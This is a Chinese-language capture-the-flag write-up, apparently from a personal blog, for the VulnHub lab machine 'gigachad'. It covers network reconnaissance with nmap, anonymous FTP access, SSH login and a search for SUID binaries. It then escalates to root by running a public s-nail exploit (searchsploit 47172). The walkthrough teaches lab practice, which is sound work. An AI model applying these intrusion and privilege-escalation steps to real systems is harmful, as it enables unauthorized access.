渗透测试靶机：gigachad

benben Posted on Mar 25 2024

Web

靶机地址：http://www.vulnhub.com/entry/gigachad-1,657/

首先，解决虚拟机无法分配ip

在启动界面按e

将此处的ro quiet替换为rw signie init=/bin/bash

![image-20240325133909393](https://p.ipic.vip/l2o3x8.png)

```
cat /etc/network/interfaces
nano /etc/network/interfaces
/etc/init.d/networking restart
```

然后修改下网卡配置文件，将enp0s3改为ens33

![image-20240325134418267](https://p.ipic.vip/q9u9mg.png)

```
nmap -sV -sC -A -p- 192.168.2.161
```

使用kali进行扫描

![image-20240325134503500](https://p.ipic.vip/xl62lk.png)

根据nmap的信息，存在ftp匿名登陆

```
ftp 192.168.2.161//存在匿名登陆，账户：ftp
ftp> ls//随后发现有个文件，将它get下来
ftp> get chadinfo
```

![image-20240325134656116](https://p.ipic.vip/b5kq6t.png)

```
cat chadinfo
file chadinfo
unzip chadinfo
cat chadinfo
```

![image-20240325134712025](https://p.ipic.vip/pa4nc4.png)

![image-20240325134816592](https://p.ipic.vip/5nrps5.png)

这边有点没看懂为啥，搜了下别人的解析

![image-20240325134834385](https://p.ipic.vip/hc2529.png)

```
ssh chad@192.168.2.161
cat user.txt//成功得到第一个flag
```

![image-20240325134911966](https://p.ipic.vip/9ozvxf.png)

```
find / -perm -u=s -type f 2>/dev/null   //命令将尝试查找具有root权限的SUID的文件
chad@gigachad:/tmp$ s-nail -V
v14.8.6
```

![image-20240325134947988](https://p.ipic.vip/srp3f8.png)

```
searchsploit s-nail
cd /tmp
searchsploit -m 47172
scp /tmp/47172.sh chad@192.168.2.161:/tmp
```

![](https://p.ipic.vip/c3l23o.png)

版本号也符合要求

```
chmod 777
./47172.sh//多执行几次就成功了
id
cd /root
cat root.txt//得到第二个flag
```

![image-20240325135118639](https://p.ipic.vip/z07c29.png)

赠人玫瑰，手留余香

Wechat Pay

Alipay

渗透测试靶机：bob